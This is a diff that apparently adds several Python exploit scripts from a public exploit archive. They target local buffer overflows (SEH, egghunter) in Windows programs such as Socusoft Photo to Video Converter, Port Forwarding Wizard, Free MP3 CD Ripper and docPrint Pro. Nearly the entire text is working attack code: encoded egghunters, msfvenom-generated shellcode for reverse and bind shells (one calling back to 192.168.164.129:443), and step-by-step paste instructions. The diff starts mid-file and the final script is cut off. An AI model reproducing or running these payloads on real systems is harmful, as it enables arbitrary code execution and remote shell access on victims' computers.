+buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
+buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
+buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
+buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
+buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
+buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
+buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
+buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
+buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
+buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
+buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
+buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
+buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
+buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
+buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
+buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
+buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
+buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
+buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
+buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
+buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
+buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
+buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
+buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
+buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
+buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
+buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
+buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"
+
+
+egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A"
+egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
+
+exploit = "A"*4096
+# 0x67031912 - pop pop ret
+exploit += "\x74\x06\x75\x04"
+exploit += "\x12\x19\x03\x67"
+exploit += egg
+exploit += "C"*(5000-4104)
+exploit += "T00WT00W"
+exploit += buf
+
+f = open("exploit.txt", "w")
+f.write(exploit)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48691.py b/exploits/windows/local/48691.py
new file mode 100755
index 000000000..15e4ac77d
--- /dev/null
+++ b/exploits/windows/local/48691.py
@@ -0,0 +1,102 @@
+# Exploit Title: Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)
+# Date: 2020-07-23
+# Exploit Author: MasterVlad
+# Vendor Homepage: http://www.dvd-photo-slideshow.com/photo-to-video-converter.html
+# Software Link: https://www.exploit-db.com/apps/ea1720441edd5990a9d0d1ed564a507e-photo-to-video-pro.exe
+# Version: 8.07
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 10 x64
+
+# Proof of Concept:
+
+# 1. Run the python script
+# 2. Open exploit.txt and copy the content to clipboard
+# 3. Open Socusoft Photo to Video Converter Professional 8.07 and go to Video Output
+# 4. Paste the clipboard into the 'Output Folder' field and click on Open
+
+#!/usr/bin/python
+
+# Badchars: 22, 2a, 3a, 3c, 3e, 3f, 7c + Non-ascii
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x22\x2a\x3a\x3c\x3e\x3f\x7c" -f py -e x86/alpha_mixed BufferRegister=EDI
+
+buf =  ""
+buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x4b\x4c\x49\x78\x6d\x52\x55\x50\x65\x50\x37\x70\x53"
+buf += "\x50\x6b\x39\x48\x65\x54\x71\x4b\x70\x45\x34\x6c\x4b"
+buf += "\x52\x70\x44\x70\x6e\x6b\x52\x72\x54\x4c\x6c\x4b\x42"
+buf += "\x72\x66\x74\x4e\x6b\x72\x52\x65\x78\x46\x6f\x6c\x77"
+buf += "\x52\x6a\x74\x66\x45\x61\x6b\x4f\x6e\x4c\x45\x6c\x45"
+buf += "\x31\x33\x4c\x55\x52\x34\x6c\x51\x30\x4f\x31\x4a\x6f"
+buf += "\x54\x4d\x46\x61\x39\x57\x5a\x42\x48\x72\x32\x72\x52"
+buf += "\x77\x6c\x4b\x30\x52\x32\x30\x4c\x4b\x72\x6a\x45\x6c"
+buf += "\x6e\x6b\x52\x6c\x42\x31\x42\x58\x79\x73\x57\x38\x76"
+buf += "\x61\x4e\x31\x32\x71\x4c\x4b\x63\x69\x31\x30\x33\x31"
+buf += "\x58\x53\x6e\x6b\x52\x69\x34\x58\x4b\x53\x64\x7a\x30"
+buf += "\x49\x4e\x6b\x36\x54\x4e\x6b\x63\x31\x69\x46\x55\x61"
+buf += "\x79\x6f\x4e\x4c\x4b\x71\x7a\x6f\x54\x4d\x46\x61\x78"
+buf += "\x47\x55\x68\x39\x70\x31\x65\x39\x66\x74\x43\x53\x4d"
+buf += "\x59\x68\x47\x4b\x51\x6d\x66\x44\x61\x65\x78\x64\x56"
+buf += "\x38\x6e\x6b\x61\x48\x37\x54\x76\x61\x6b\x63\x31\x76"
+buf += "\x4c\x4b\x66\x6c\x72\x6b\x4e\x6b\x71\x48\x35\x4c\x33"
+buf += "\x31\x68\x53\x6e\x6b\x75\x54\x4c\x4b\x56\x61\x6a\x70"
+buf += "\x6c\x49\x32\x64\x74\x64\x44\x64\x73\x6b\x31\x4b\x70"
+buf += "\x61\x53\x69\x30\x5a\x63\x61\x6b\x4f\x49\x70\x33\x6f"
+buf += "\x31\x4f\x31\x4a\x4c\x4b\x37\x62\x48\x6b\x4e\x6d\x63"
+buf += "\x6d\x31\x78\x45\x63\x44\x72\x57\x70\x57\x70\x42\x48"
+buf += "\x30\x77\x44\x33\x45\x62\x33\x6f\x33\x64\x30\x68\x50"
+buf += "\x4c\x34\x37\x44\x66\x53\x37\x79\x6f\x68\x55\x4e\x58"
+buf += "\x6a\x30\x63\x31\x53\x30\x33\x30\x75\x79\x68\x44\x42"
+buf += "\x74\x46\x30\x71\x78\x71\x39\x6d\x50\x42\x4b\x77\x70"
+buf += "\x79\x6f\x59\x45\x62\x70\x56\x30\x76\x30\x32\x70\x37"
+buf += "\x30\x56\x30\x31\x50\x66\x30\x53\x58\x78\x6a\x76\x6f"
+buf += "\x49\x4f\x6b\x50\x6b\x4f\x6e\x35\x6c\x57\x33\x5a\x34"
+buf += "\x45\x61\x78\x59\x50\x4f\x58\x39\x34\x6e\x61\x70\x68"
+buf += "\x75\x52\x67\x70\x63\x31\x6f\x4b\x6d\x59\x6a\x46\x61"
+buf += "\x7a\x56\x70\x62\x76\x73\x67\x53\x58\x6d\x49\x69\x35"
+buf += "\x64\x34\x43\x51\x69\x6f\x6e\x35\x6b\x35\x4b\x70\x72"
+buf += "\x54\x76\x6c\x39\x6f\x62\x6e\x65\x58\x64\x35\x6a\x4c"
+buf += "\x55\x38\x5a\x50\x4e\x55\x4c\x62\x30\x56\x4b\x4f\x4a"
+buf += "\x75\x63\x58\x70\x63\x50\x6d\x70\x64\x47\x70\x6b\x39"
+buf += "\x6b\x53\x43\x67\x51\x47\x62\x77\x45\x61\x6a\x56\x43"
+buf += "\x5a\x46\x72\x32\x79\x43\x66\x39\x72\x79\x6d\x61\x76"
+buf += "\x4b\x77\x61\x54\x76\x44\x55\x6c\x66\x61\x63\x31\x6e"
+buf += "\x6d\x43\x74\x76\x44\x74\x50\x4b\x76\x45\x50\x32\x64"
+buf += "\x71\x44\x52\x70\x66\x36\x73\x66\x30\x56\x52\x66\x31"
+buf += "\x46\x42\x6e\x62\x76\x51\x46\x43\x63\x73\x66\x71\x78"
+buf += "\x50\x79\x38\x4c\x67\x4f\x4e\x66\x6b\x4f\x69\x45\x6c"
+buf += "\x49\x6b\x50\x42\x6e\x63\x66\x42\x66\x59\x6f\x64\x70"
+buf += "\x70\x68\x36\x68\x6d\x57\x75\x4d\x51\x70\x79\x6f\x58"
+buf += "\x55\x6d\x6b\x5a\x50\x48\x35\x4e\x42\x76\x36\x52\x48"
+buf += "\x4d\x76\x4f\x65\x4d\x6d\x6f\x6d\x79\x6f\x4a\x75\x57"
+buf += "\x4c\x77\x76\x71\x6c\x57\x7a\x4d\x50\x69\x6b\x69\x70"
+buf += "\x31\x65\x65\x55\x4f\x4b\x72\x67\x67\x63\x31\x62\x72"
+buf += "\x4f\x53\x5a\x75\x50\x72\x73\x6b\x4f\x5a\x75\x41\x41"
+
+
+
+egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x2C\x09\x50\x5c"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
+
+exploit = "A"*304
+exploit += "\x74\x06\x75\x04"
+# 0x10047a1e
+exploit += "\x1e\x7a\x04\x10"
+exploit += egg
+exploit += "B"*(2000-312-len(egg))
+exploit += "T00WT00W"
+exploit += buf
+
+f = open("exploit.txt", "w")
+f.write(exploit)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48695.py b/exploits/windows/local/48695.py
new file mode 100755
index 000000000..226d2afac
--- /dev/null
+++ b/exploits/windows/local/48695.py
@@ -0,0 +1,75 @@
+# Exploit Title: Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH) 
+# Exploit Author: Sarang Tumne
+# Date: 2020-07-18
+# CVE ID: N/A
+# Confirmed on release 4.8.0 and 4.5.0
+# Vendor: http://www.port-forwarding.net/
+# Tested on OS- Windows Vista
+# Buffer overflow in upRedSun Port Forwarding Wizard 4.8.0 and earlier version allows local 
+# attackers to execute arbitrary code via a long request in the Register feature.
+
+###############################################
+
+#!/usr/bin/python
+
+file=open("payload.txt","w+b")
+
+buffer="\x90"*164
+buffer+="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x73\x61\x72\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"  # EggHunter
+buffer+="\x90"*20
+
+shellcode="sarasara" 		#Egg tag- sarasara
+shellcode+="\x90"*40
+shellcode+=("\xdd\xc7\xd9\x74\x24\xf4\x58\x50\x59\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
+"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
+"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x6b"
+"\x4c\x6d\x38\x6c\x42\x53\x30\x57\x70\x33\x30\x51\x70\x6e\x69"
+"\x78\x65\x36\x51\x6f\x30\x35\x34\x4e\x6b\x52\x70\x54\x70\x4e"
+"\x6b\x46\x32\x76\x6c\x6c\x4b\x70\x52\x62\x34\x6e\x6b\x33\x42"
+"\x54\x68\x66\x6f\x4e\x57\x71\x5a\x34\x66\x70\x31\x49\x6f\x4e"
+"\x4c\x57\x4c\x65\x31\x61\x6c\x37\x72\x54\x6c\x55\x70\x59\x51"
+"\x48\x4f\x44\x4d\x43\x31\x4a\x67\x49\x72\x5a\x52\x33\x62\x70"
+"\x57\x4c\x4b\x50\x52\x56\x70\x6c\x4b\x73\x7a\x35\x6c\x4c\x4b"
+"\x50\x4c\x42\x31\x70\x78\x49\x73\x53\x78\x46\x61\x4a\x71\x52"
+"\x71\x4e\x6b\x30\x59\x71\x30\x55\x51\x4a\x73\x4e\x6b\x71\x59"
+"\x36\x78\x78\x63\x35\x6a\x37\x39\x6c\x4b\x77\x44\x6e\x6b\x76"
+"\x61\x39\x46\x76\x51\x59\x6f\x6e\x4c\x4a\x61\x78\x4f\x54\x4d"
+"\x77\x71\x5a\x67\x36\x58\x79\x70\x54\x35\x69\x66\x74\x43\x51"
+"\x6d\x58\x78\x55\x6b\x43\x4d\x46\x44\x70\x75\x5a\x44\x50\x58"
+"\x4e\x6b\x62\x78\x65\x74\x73\x31\x6b\x63\x42\x46\x6c\x4b\x36"
+"\x6c\x50\x4b\x4e\x6b\x42\x78\x65\x4c\x33\x31\x69\x43\x4c\x4b"
+"\x47\x74\x4e\x6b\x77\x71\x78\x50\x4c\x49\x50\x44\x76\x44\x66"
+"\x44\x43\x6b\x61\x4b\x31\x71\x51\x49\x63\x6a\x43\x61\x39\x6f"
+"\x49\x70\x61\x4f\x73\x6f\x53\x6a\x4e\x6b\x37\x62\x68\x6b\x6c"
+"\x4d\x63\x6d\x45\x38\x56\x53\x30\x32\x47\x70\x47\x70\x55\x38"
+"\x62\x57\x74\x33\x67\x42\x31\x4f\x61\x44\x33\x58\x50\x4c\x31"
+"\x67\x35\x76\x64\x47\x39\x6f\x6b\x65\x6f\x48\x6a\x30\x37\x71"
+"\x73\x30\x67\x70\x57\x59\x48\x44\x30\x54\x66\x30\x75\x38\x67"
+"\x59\x6d\x50\x32\x4b\x35\x50\x4b\x4f\x6a\x75\x76\x30\x30\x50"
+"\x50\x50\x36\x30\x37\x30\x36\x30\x43\x70\x52\x70\x31\x78\x78"
+"\x6a\x56\x6f\x49\x4f\x69\x70\x4b\x4f\x39\x45\x5a\x37\x31\x7a"
+"\x44\x45\x61\x78\x49\x50\x39\x38\x56\x58\x30\x6c\x73\x58\x55"
+"\x52\x73\x30\x56\x71\x43\x6c\x4c\x49\x4b\x56\x30\x6a\x56\x70"
+"\x43\x66\x70\x57\x31\x78\x5a\x39\x49\x35\x62\x54\x50\x61\x39"
+"\x6f\x7a\x75\x4f\x75\x6f\x30\x73\x44\x46\x6c\x4b\x4f\x70\x4e"
+"\x76\x68\x61\x65\x5a\x4c\x53\x58\x68\x70\x4f\x45\x79\x32\x46"
+"\x36\x59\x6f\x4a\x75\x63\x58\x32\x43\x52\x4d\x61\x74\x57\x70"
+"\x6b\x39\x4a\x43\x63\x67\x76\x37\x63\x67\x64\x71\x69\x66\x62"
+"\x4a\x46\x72\x73\x69\x61\x46\x6a\x42\x6b\x4d\x63\x56\x4a\x67"
+"\x71\x54\x71\x34\x67\x4c\x47\x71\x46\x61\x6c\x4d\x53\x74\x37"
+"\x54\x46\x70\x38\x46\x63\x30\x37\x34\x70\x54\x50\x50\x36\x36"
+"\x61\x46\x52\x76\x53\x76\x53\x66\x50\x4e\x46\x36\x33\x66\x36"
+"\x33\x42\x76\x52\x48\x70\x79\x68\x4c\x37\x4f\x4f\x76\x59\x6f"
+"\x38\x55\x4f\x79\x6b\x50\x70\x4e\x32\x76\x77\x36\x49\x6f\x46"
+"\x50\x55\x38\x44\x48\x6d\x57\x47\x6d\x61\x70\x59\x6f\x6e\x35"
+"\x4d\x6b\x4b\x4e\x74\x4e\x64\x72\x39\x7a\x72\x48\x4e\x46\x6c"
+"\x55\x6f\x4d\x6d\x4d\x59\x6f\x48\x55\x65\x6c\x66\x66\x71\x6c"
+"\x37\x7a\x6f\x70\x79\x6b\x6d\x30\x54\x35\x66\x65\x6f\x4b\x47"
+"\x37\x46\x73\x53\x42\x72\x4f\x72\x4a\x55\x50\x66\x33\x49\x6f"
+"\x39\x45\x41\x41")
+buffer+="\xeb\xb6\x90\x90"   #Backward short jump- nseh
+buffer+="\x6d\x57\x37\x7c"   #PPR- SEH
+buffer+="A"*200
+file.write(buffer+shellcode)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48696.py b/exploits/windows/local/48696.py
new file mode 100755
index 000000000..e7558d29a
--- /dev/null
+++ b/exploits/windows/local/48696.py
@@ -0,0 +1,62 @@
+# Exploit Title: Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)
+# Date: 2020-07-22
+# Exploit Author: Eduard Palisek
+# Vendor Homepage: https://www.cleanersoft.com
+# Software Link: https://www.cleanersoft.com/download/FMCRSetup.exe
+# Version: 2.8 Build 20140611
+# Tested on: [Windows XP, Professional, Version 2002, SP 3
+#!/usr/bin/python
+file = open("exploit.wav", "wb")
+
+# msfvenom -p windows/shell_bind_tcp LPORT=9001 -a x86 EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\" -f python -v shellcode_bind
+
+shellcode_bind =  b""
+shellcode_bind += b"\xb8\x88\xbf\xa2\x65\xdb\xd6\xd9\x74\x24"
+shellcode_bind += b"\xf4\x5a\x2b\xc9\xb1\x53\x83\xc2\x04\x31"
+shellcode_bind += b"\x42\x0e\x03\xca\xb1\x40\x90\x36\x25\x06"
+shellcode_bind += b"\x5b\xc6\xb6\x67\xd5\x23\x87\xa7\x81\x20"
+shellcode_bind += b"\xb8\x17\xc1\x64\x35\xd3\x87\x9c\xce\x91"
+shellcode_bind += b"\x0f\x93\x67\x1f\x76\x9a\x78\x0c\x4a\xbd"
+shellcode_bind += b"\xfa\x4f\x9f\x1d\xc2\x9f\xd2\x5c\x03\xfd"
+shellcode_bind += b"\x1f\x0c\xdc\x89\xb2\xa0\x69\xc7\x0e\x4b"
+shellcode_bind += b"\x21\xc9\x16\xa8\xf2\xe8\x37\x7f\x88\xb2"
+shellcode_bind += b"\x97\x7e\x5d\xcf\x91\x98\x82\xea\x68\x13"
+shellcode_bind += b"\x70\x80\x6a\xf5\x48\x69\xc0\x38\x65\x98"
+shellcode_bind += b"\x18\x7d\x42\x43\x6f\x77\xb0\xfe\x68\x4c"
+shellcode_bind += b"\xca\x24\xfc\x56\x6c\xae\xa6\xb2\x8c\x63"
+shellcode_bind += b"\x30\x31\x82\xc8\x36\x1d\x87\xcf\x9b\x16"
+shellcode_bind += b"\xb3\x44\x1a\xf8\x35\x1e\x39\xdc\x1e\xc4"
+shellcode_bind += b"\x20\x45\xfb\xab\x5d\x95\xa4\x14\xf8\xde"
+shellcode_bind += b"\x49\x40\x71\xbd\x05\xa5\xb8\x3d\xd6\xa1"
+shellcode_bind += b"\xcb\x4e\xe4\x6e\x60\xd8\x44\xe6\xae\x1f"
+shellcode_bind += b"\xaa\xdd\x17\x8f\x55\xde\x67\x86\x91\x8a"
+shellcode_bind += b"\x37\xb0\x30\xb3\xd3\x40\xbc\x66\x49\x48"
+shellcode_bind += b"\x1b\xd9\x6c\xb5\xdb\x89\x30\x15\xb4\xc3"
+shellcode_bind += b"\xbe\x4a\xa4\xeb\x14\xe3\x4d\x16\x97\x28"
+shellcode_bind += b"\xa7\x9f\x71\x44\xa7\xc9\x2a\xf0\x05\x2e"
+shellcode_bind += b"\xe3\x67\x75\x04\x5b\x0f\x3e\x4e\x5c\x30"
+shellcode_bind += b"\xbf\x44\xca\xa6\x34\x8b\xce\xd7\x4a\x86"
+shellcode_bind += b"\x66\x80\xdd\x5c\xe7\xe3\x7c\x60\x22\x93"
+shellcode_bind += b"\x1d\xf3\xa9\x63\x6b\xe8\x65\x34\x3c\xde"
+shellcode_bind += b"\x7f\xd0\xd0\x79\xd6\xc6\x28\x1f\x11\x42"
+shellcode_bind += b"\xf7\xdc\x9c\x4b\x7a\x58\xbb\x5b\x42\x61"
+shellcode_bind += b"\x87\x0f\x1a\x34\x51\xf9\xdc\xee\x13\x53"
+shellcode_bind += b"\xb7\x5d\xfa\x33\x4e\xae\x3d\x45\x4f\xfb"
+shellcode_bind += b"\xcb\xa9\xfe\x52\x8a\xd6\xcf\x32\x1a\xaf"
+shellcode_bind += b"\x2d\xa3\xe5\x7a\xf6\xc3\x07\xae\x03\x6c"
+shellcode_bind += b"\x9e\x3b\xae\xf1\x21\x96\xed\x0f\xa2\x12"
+shellcode_bind += b"\x8e\xeb\xba\x57\x8b\xb0\x7c\x84\xe1\xa9"
+shellcode_bind += b"\xe8\xaa\x56\xc9\x38"
+
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+nops  = "\x90" * 30
+junk1 = "A" * 2112
+tag   = "W00TW00T"
+junk2 = "B" * (2000-len(shellcode_bind+nops+tag))
+eip   = "\x53\x93\x42\x7e"   # 0x7e429353 : jmp esp in user32.dll
+
+buffer  = junk1 + tag + nops + shellcode_bind + junk2 + eip + nops + egghunter
+
+file.write(buffer)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48719.py b/exploits/windows/local/48719.py
new file mode 100755
index 000000000..acf6c7333
--- /dev/null
+++ b/exploits/windows/local/48719.py
@@ -0,0 +1,99 @@
+# Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)
+# Date: 2020-07-26
+# Exploit Author: MasterVlad
+# Vendor Homepage: http://www.verypdf.com
+# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
+# Version: 8.0
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 7 32-bit
+
+# Proof of Concept:
+
+# 1. Run the python script
+# 2. Open exploit.txt and copy the content to clipboard
+# 3. Open doc2pdf_win.exe and go to File -> Add URL
+# 4. Paste the clipboard into the field and click on Ok
+
+#!/usr/bin/python
+
+# encoded egghunter
+egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A"
+egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
+egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
+
+buf =  ""
+buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
+buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
+buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
+buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
+buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
+buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
+buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
+buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
+buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
+buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
+buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
+buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
+buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
+buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
+buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
+buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
+buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
+buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
+buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
+buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
+buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
+buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
+buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
+buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
+buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
+buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
+buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
+buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
+buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
